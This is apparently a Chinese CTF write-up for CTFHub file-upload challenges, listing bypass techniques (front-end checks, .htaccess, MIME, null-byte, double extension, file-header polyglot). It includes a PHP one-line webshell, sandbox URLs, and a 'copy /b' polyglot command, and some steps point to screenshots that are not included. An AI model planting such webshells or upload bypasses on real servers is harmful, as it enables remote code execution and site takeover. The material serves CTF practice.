ctfhub文件上传

⽆验证

上传⼀句话⽊⻢,发现上传成功

复制代码
1.php ⼀句话⽊⻢内容:
<?php @eval($_POST[cmd]);?>

上传⼀句话⽊⻢,发现上传成功

复制代码
http://challenge-8b27d18368ecc25c.sandbox.ctfhub.com:10800/upload/1.ph
p

前端验证

开启题⽬

上传⼀个 1.jpg,内容是

复制代码
<?php @eval($_POST[cmd]);?>

上传抓包,修改后缀为 php

放包,上传成功

蚁剑连接

复制代码
http://challenge-3c592a81e5b9e7a6.sandbox.ctfhub.com:10800/upload/1.ph
p

在/var/www/html/flag_2925720673.php找到flag

.htaccess

先上传.htaccess

再上传1.jpg

蚁剑连接

注意是1.jpg不是1.php

复制代码
http://challenge-dc29f7e0bd8df3ff.sandbox.ctfhub.com:10800/upload/1.jpg

得到flag

MIME 绕过

上传2.jpg抓包修改为2.php

蚁剑连接

00 截断

上传2.php抓包并修改成如下图所示

蚁剑连接

双写绕过

抓包修改成如下所示

蚁剑连接

⽂件头检测

命令行以管理员身份运行

png照片可截图获得,不可通过改文件后缀获得

且必须在文件所在目录下

复制代码
copy 2.png/b + 2.php/a 3.png

上传3.png并抓包修改

蚁剑连接

相关推荐
迷路的小绅士1 小时前
防火墙技术深度解析:从包过滤到云原生防火墙的部署与实战
网络安全·云原生·防火墙技术·包过滤防火墙·状态检测防火墙
浩浩测试一下5 小时前
计算机网络中的DHCP是什么呀? 详情解答
android·网络·计算机网络·安全·web安全·网络安全·安全架构
蚁景网络安全5 小时前
从字节码开始到ASM的gadgetinspector源码解析
网络安全
浩浩测试一下7 小时前
SQL注入高级绕过手法汇总 重点
数据库·sql·安全·web安全·网络安全·oracle·安全架构
谈不譚网安8 小时前
CSRF请求伪造
前端·网络安全·csrf
JM丫9 小时前
PWNOS:2.0(vulnhub靶机)
网络安全
半路_出家ren12 小时前
流量抓取工具(wireshark)
网络·网络协议·测试工具·网络安全·wireshark·流量抓取工具
ALe要立志成为web糕手13 小时前
[BJDCTF2020]EzPHP
web安全·网络安全·php·ctf
自由鬼15 小时前
开源漏洞扫描器:OpenVAS
运维·服务器·安全·网络安全·开源·漏洞管理
TazmiDev15 小时前
2025 XYCTF ezsql 详细教程wp
web安全·网络安全·ctf·sql注入·布尔盲注